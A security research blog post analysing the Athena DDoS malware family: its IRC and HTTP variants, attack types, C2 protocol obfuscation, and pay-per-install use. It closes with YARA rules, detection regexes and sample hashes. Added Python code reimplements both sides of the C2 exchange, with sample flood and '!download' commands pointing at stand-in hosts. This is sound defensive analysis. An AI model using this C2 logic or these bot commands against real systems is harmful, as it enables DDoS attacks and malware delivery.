Athena, A DDoS Malware Odyssey

By: Jason Jones

The Athena malware family has existed for quite some time and appears to have a love/hate relationship with the people who discuss it in various “underground” forums. The original version was IRC-based, but earlier this year an HTTP-based version was released. While not as prevalent as other malware families, Athena has had a strong presence in our malware processing system for quite some time. This blog post discusses its origins and DDoS capabilities, goes over its latest evolution, and offers some details on how to identify it.

Athena’s IRC Origins

I first discovered Athena via a Pastebin post that showed an IRC log of someone ordering attacks via an IRC channel. Some googling and then subsequent searching of our zoo for the patterns yielded a wide range of versions of Athena IRC. Many of these appeared to be used to install other malware rather than for DDoS. The majority of CnCs would put a few sets of initial commands in the IRC channel topic to order their bots to botkill, download other malware, attack a specific site, etc. Athena IRC also used a recognizable IRC nick format:

n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}
AthenaIRC 2.3.1 Manual Cover

Athena has been around for a number of years and is the product of a programmer who goes by the handle “_Stoner”. In the 1.X days of Athena IRC, builders were distributed, but these were cracked and posted online for anyone to use in botnet-building escapades without having to purchase one. Some of these cracked builders contained strings disparaging the quality of Athena and also referenced IPKiller (aka MP-DDOS) as being superior.

The 2.X versions saw this distribution model change: _Stoner now controls the building and distribution of binaries for his customers. Judging from forum posts and the proliferation of versions we have seen come through our zoo, business seems to be going well. However, there are numerous complaints on some of the forums about _Stoner going into their IRC servers and channels and taking control of their botnets. He is quick to respond that this is not the case, but that does not appear to help his reputation in some of the underground communities. The version 2 series also saw a significant number of commands added: more DDoS commands, more password-stealing functionality, “IRC War” commands, file find and upload, etc. The bot also optionally features an “encrypted” IP option for the CnC that obfuscates the IP address by adding or subtracting a static value from each octet, depending on whether that octet falls in the top or bottom half of the valid octet range. This feature was observed in our sandboxing system many times: a CnC hostname pointed to one IP, but a different IP was then connected to for CnC – quite confusing initially, but easy to spot once we found out some of the binaries had this feature. Athena also has encrypted commands that simply use a lookup table to find an index into a keyring and then a secondary lookup to get the decrypted character.

The pricing structure for 2.3.1 is $100 for one build, $10 to rebuild or update, $15 to have _Stoner set up your IRC, and $130 for a ready-made IRC channel that is “capable of holding 20k bots” plus one build.

Athena, Goddess of IRC War?

Not quite :) When I first started reversing Athena IRC, I felt like Daedalus trying to navigate the Labyrinth. I finally found my way to an exit and avoided the Minotaur, whilst discovering where the DDoS commands were processed.

Athena IRC Command Parsing

Athena offers many DDoS attacks, including standard HTTP GET/POST floods, UDP flood, RUDY, Slowloris, Slowpost, ARME, HTTP flood via a hidden browser, bandwidth floods and an established-connection flood attack. The attacks perform as advertised but, unlike other DDoS bots, Athena can only carry out one attack at a time. This severely limits its ability to compete in the underground DDoS-for-hire marketplace with bots like Madness, Drive, and DirtJumper.

For its HTTP-based attacks, Athena uses one subroutine to construct the HTTP request template. Random numbers are generated, and depending on whether they fall above or below certain thresholds, different values are selected for a header; in some cases the random value determines whether a header is included at all. The image below illustrates the possible headers and the potential values for those that are included. Green means the value is selected based on which attack was ordered, values in black are always included, headers in blue are randomly included, and the red values are the pool from which the final header value is selected.

Athena HTTP Request Building

Athena Moves to HTTP

The HTTP version of Athena first popped onto my radar in late March of this year, when Exposed Botnets covered it for the first time, but I was not able to locate any samples at the time. Fast forward a few weeks and many samples started flowing our way.

The command and control protocol for Athena HTTP is fairly interesting. Three parameters – a, b and c – are sent with the POST request to the CnC. The a parameter is a fully URL-encoded base64 string that decodes to a colon-separated string translation table. That table is applied to the b parameter, another base64 string (this time not URL-encoded), which is then base64-decoded to yield the bot's phone-home data; c is used as a data marker on the response from the server. The initial phone-home format string is below, where gend is the “gender” (laptop, desktop, etc.), ver is the Athena HTTP version installed, net is the .NET version installed, and the rest are fairly self-explanatory.

  |type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|

Subsequent phone-homes use the following format string. The bk_ fields carry “botkill” counts, and busy signals whether or not the bot is currently busy with a command.

  |type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

The server applies the string translation table sent by the bot to the set of newline-separated, base64-encoded commands before adding the data marker to the front of the string. Because the table is supplied by the bot in its own request, determining the commands sent by the CnC is extremely difficult without capturing that original phone-home. The commands sent by the CnC are pipe-delimited, with taskid=<task id> in the first part and command=<command> in the second.

The commands follow exactly the same structure as the IRC version, and the same parsing method is used once the command is extracted. Some examples are presented below:

|taskid=120|command=!ddos.layer4.udp <target-site> <port> <time>|
|taskid=115|command=!ddos.http.bandwidth <target-url> <port> <time>|
|taskid=37|command=!download <target-url> 1|

A script to decode the phone-home and display commands is included in the ASERT GitHub repository.
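As an added illustration of the exchange described above (this is not the ASERT repository script, nor code recovered from the malware or its panel), the following Python models both ends of the check-in. It assumes that the colon-separated table is two equal-length halves of the base64 alphabet mapped character for character, that the server applies the same direction of that mapping to both the b parameter and its own reply while the bot applies the inverse, and that the marker c is simply prepended to the reply. The phone-home values, task list and marker are constructed, not taken from a real capture.

```python
import base64
import random
import string
from urllib.parse import quote, unquote

# Base64 alphabet plus padding; the constructed table below covers all of it.
B64_CHARS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="


def make_table(seed=7):
    """Build a constructed 'left:right' translation table for the example.

    Assumption (not stated on the page): the colon separates two equal-length
    strings and translation is a per-character substitution between them.
    """
    shuffled = list(B64_CHARS)
    random.Random(seed).shuffle(shuffled)
    return B64_CHARS + ":" + "".join(shuffled)


def build_maps(table):
    """Return (server_map, bot_map) for a 'left:right' table.

    Assumed direction: the server applies left->right to the bot's b parameter
    and to its own reply; the bot applies right->left.
    """
    left, _, right = table.partition(":")
    if not right or len(left) != len(right):
        raise ValueError("malformed translation table")
    return str.maketrans(left, right), str.maketrans(right, left)


def parse_phone_home(text):
    """'|type:on_exec|uid:...|' -> dict of field name to value."""
    fields = {}
    for part in text.strip("|").split("|"):
        key, _, value = part.partition(":")
        fields[key] = value
    return fields


def parse_task(text):
    """'|taskid=120|command=!ddos...|' -> (task id, command string)."""
    fields = dict(part.split("=", 1) for part in text.strip("|").split("|"))
    return int(fields["taskid"]), fields["command"]


def bot_checkin(table, phone_home, marker):
    """Bot side: build the a/b/c POST parameters."""
    _, bot_map = build_maps(table)
    a = quote(base64.b64encode(table.encode()).decode(), safe="")  # fully URL-encoded
    b = base64.b64encode(phone_home.encode()).decode().translate(bot_map)
    return {"a": a, "b": b, "c": marker}


def server_decode_checkin(params):
    """CnC side: recover the table from a, then the phone-home from b."""
    table = base64.b64decode(unquote(params["a"])).decode()
    server_map, _ = build_maps(table)
    phone_home = base64.b64decode(params["b"].translate(server_map)).decode()
    return table, parse_phone_home(phone_home)


def server_build_response(table, marker, tasks):
    """CnC side: base64 each task line, apply the table, prepend the marker c."""
    server_map, _ = build_maps(table)
    lines = ["|taskid=%d|command=%s|" % (tid, cmd) for tid, cmd in tasks]
    body = "\n".join(base64.b64encode(line.encode()).decode() for line in lines)
    return marker + body.translate(server_map)


def decode_response(table, marker, body):
    """Bot/analyst side: without the table from the captured POST this fails."""
    if not body.startswith(marker):
        raise ValueError("response does not start with the data marker")
    _, bot_map = build_maps(table)
    tasks = []
    for line in body[len(marker):].split("\n"):
        if line:
            tasks.append(parse_task(base64.b64decode(line.translate(bot_map)).decode()))
    return tasks


# Constructed sample exchange (values are invented, not from a real capture).
SAMPLE_CHECKIN = ("|type:on_exec|uid:0123456789abcdef|priv:admin|arch:x64|gend:desktop"
                  "|cores:4|os:Windows 7|ver:1.0.0|net:4.0|")
SAMPLE_TASKS = [(120, "!ddos.layer4.udp target.example 80 60"),
                (37, "!download http://drop.example/a.exe 1")]


def demo():
    """Round-trip the constructed exchange; returns (phone-home dict, task list)."""
    table = make_table()
    marker = "[[c]]"  # constructed data marker
    params = bot_checkin(table, SAMPLE_CHECKIN, marker)
    recovered_table, fields = server_decode_checkin(params)
    body = server_build_response(recovered_table, params["c"], SAMPLE_TASKS)
    return fields, decode_response(table, marker, body)


if __name__ == "__main__":
    print(demo())
```

When working from a packet capture, feed the a and c values from the bot's POST into decode_response together with the raw response body; if only the response was captured, there is no table to invert and the base64 will not decode, which is exactly the difficulty described above.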

Athena Commands Her DDoS Army

Some careless botnet admins left archives of their control panels on their CnCs, which greatly sped up my reverse engineering of how the Athena HTTP binaries operate. The server-side PHP code has a decent amount of obfuscation, but it is not terribly difficult to bypass. The screenshots below show the stages of deobfuscation I went through to recover readable PHP code:

The panel isn't anything flashy, but it is quite usable and shows the state of all bots and commands. I fired up an internal instance of the control panel to experiment with, and the results are below (please note: these are not real commands, all fake):

Athena, Beyond DDoS

Athena HTTP shares the previously described weakness of only being able to carry out one attack at a time and has not been observed to be nearly as active in the DDoS space as other bots monitored by ASERT. This raises the question of what it is used for. One of the most popular uses we have observed on the CnCs we monitor is as a pay-per-install (PPI) botnet. Over the last 6 months, we have collected over 150 new executables by monitoring which URLs the bots were told to download. A timeline graph is shown below; unlabeled yellow dots are samples that were unidentified by our tagging system and did not exist on VirusTotal at the time of initial processing. Many of these turned out to be Bitcoin/Litecoin/etc. miners, while others were password-stealing applications. Apologies for the overlap on names, but it was extremely difficult to separate them further due to the high volume during a few short periods where people appeared to be testing out their new botnets :). The large gap from late August into October was due to a slight change in identification that caused our monitoring system to miss new samples, and is not necessarily reflective of new malware not being dropped.

Athena HTTP Dropped Malware Timeline

Athena’s Achilles Heel

Easy identification via multiple means. The easily identifiable IRC nicks and recognizable HTTP POSTs discussed previously make detection on the network easy, but there are also many other ways to identify both versions of this malware. Athena – both IRC and HTTP – typically uses mutexes that match (UPDATE_|BACKUP_|MAIN_)-?[0-9]{10} (great for finding samples on malwr.com via a mutex: search) and additionally has many easily identifiable strings depending on the version. One YARA rule presented below catches many, but not all, versions of the IRC variant, and another rule that has so far detected every HTTP version we have seen is also presented – both are also available in the Arbor GitHub repository. The Microsoft Security Essentials engine identifies the IRC and early versions of Athena HTTP as Trojan:Win32/Squida.A, but has more recently started identifying Athena HTTP as Trojan:Win32/Folyris.A.

rule athena_http {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena HTTP identification"
  strings:
    $fmt_str1 = "|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
    $fmt_str2 = "|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
    $cmd1 = "filesearch.stop"
    $cmd2 = "rapidget"
    $cmd3 = "layer4."
    $cmd4 = "slowloris"
    $cmd5 = "rudy"
  condition:
    all of ($fmt_str*) and 3 of ($cmd*)
}

rule athena_irc {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Athena IRC v1.8.x, 2.x identification"
  strings:
    $cmd1 = "ddos." fullword
    $cmd2 = "layer4." fullword
    $cmd3 = "war." fullword
    $cmd4 = "smartview" fullword
    $cmd5 = "ftp.upload" fullword
    $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
    $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
    $msg3 = "%s %s :%s FTP Upload: Failed"
    $msg4 = "Athena v2"
    $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
    // v1 strs
    $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
    $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
    $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
    $amsg4 = "IPKiller>Athena"
    $amsg5 = "Athena=Shit!"
    $amsg6 = "Athena-v1"
    $amsg7 = "BTC wallet.dat file found"
    $amsg8 = "MineCraft lastlogin file found"
    $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
    $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
    // Athena-v1.8.3
    $amsg11 = "Rapid Connect/Disconnect"
    $amsg12 = "BTC wallet.dat found,"
    // v1 cmds
    $acmd1 = ":!arme"
    $acmd2 = ":!openurl"
    $acmd3 = ":!condis"
    $acmd4 = ":!httpcombo"
    $acmd5 = ":!urlblock"
    $acmd6 = ":!udp"
    $acmd7 = ":!btcwallet"
  condition:
    (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
}
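As an added example (not part of the original post or the Arbor repository), the following Python turns the IRC nick template and the mutex pattern given above into regular expressions and runs them over constructed IRC log lines and sandbox mutex names, the kind of host and network artifacts the YARA rules complement. The field values inside the sample nicks are invented to fit the template; the sixth bracketed field is kept as the literal “??” shown there, since its meaning is not given.

```python
import re

# Nick template from the post: n[<country>|<privilege>|<desktop/laptop>|<OS version>|<architecture>|??][a-z]{8}
# Fields are only constrained to contain no '|' or ']'; the suffix is eight lowercase letters.
NICK_RE = re.compile(
    r"n\[(?P<country>[^|\]]*)\|(?P<priv>[^|\]]*)\|(?P<kind>[^|\]]*)\|"
    r"(?P<os>[^|\]]*)\|(?P<arch>[^|\]]*)\|(?P<extra>[^|\]]*)\](?P<rand>[a-z]{8})"
)
# Mutex pattern quoted in the post, anchored so partial names do not match.
MUTEX_RE = re.compile(r"^(UPDATE_|BACKUP_|MAIN_)-?[0-9]{10}$")
# Server-to-client IRC lines carry the sender as ':nick!user@host'.
PREFIX_RE = re.compile(r"^:([^!\s]+)!")


def athena_nicks(irc_lines):
    """Return the decoded field dict for every Athena-style nick seen as a message prefix."""
    hits = []
    for line in irc_lines:
        prefix = PREFIX_RE.match(line)
        if not prefix:
            continue
        m = NICK_RE.fullmatch(prefix.group(1))
        if m:
            hits.append(m.groupdict())
    return hits


def athena_mutexes(names):
    """Filter mutex names (e.g. from a sandbox report) down to Athena-style ones."""
    return [name for name in names if MUTEX_RE.match(name)]


# Constructed sample data; field values are invented, not from a real botnet.
SAMPLE_IRC = [
    ":n[US|admin|desktop|7|64|??]qwertyui!qwertyui@1.2.3.4 JOIN :#bots",
    ":n[DE|user|laptop|XP|32|??]asdfghjk!asdfghjk@5.6.7.8 JOIN :#bots",
    ":operator!op@9.9.9.9 PRIVMSG #bots :!ddos.layer4.udp target.example 80 60",
    ":n[GB|admin|desktop|8|64|??]zxcv!zxcv@8.8.8.8 JOIN :#bots",  # 4-letter suffix: no match
]
SAMPLE_MUTEXES = [
    "MAIN_1234567890",
    "UPDATE_-0987654321",
    "BACKUP_123",                       # too few digits: no match
    "Global\\MSCTF.Asm.MutexDefault1",  # unrelated system mutex
]

if __name__ == "__main__":
    for hit in athena_nicks(SAMPLE_IRC):
        print(hit)
    print(athena_mutexes(SAMPLE_MUTEXES))
```

The nick regex is deliberately loose on field contents because the post only gives the layout, not the value vocabulary; tighten the country and architecture groups once you have observed real values from your own captures.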

Related MD5s:

Athena IRC

3eb262817d8ab8a6f2282f0455c6ac03
859c2fec50ba1212dca9f00aa4a64ec4
0044e1e55b9524cc72b4060e5e84293d
cd962b1cfdfa6e3921adfc3750e95282
02214f425bf9c2c67d49e267bc4c84f6

Athena HTTP

2a8b26d216aea6fad8dd2297fd054413
e8bda57d4ca45cbe5d780a87e5052d0a
2d9f8082be96150b7f483ea5e863fcaa
7535a5ee124612cbaaf0e5a53b29158a
f1c083104fa4992e9f47a5b87e2c64f0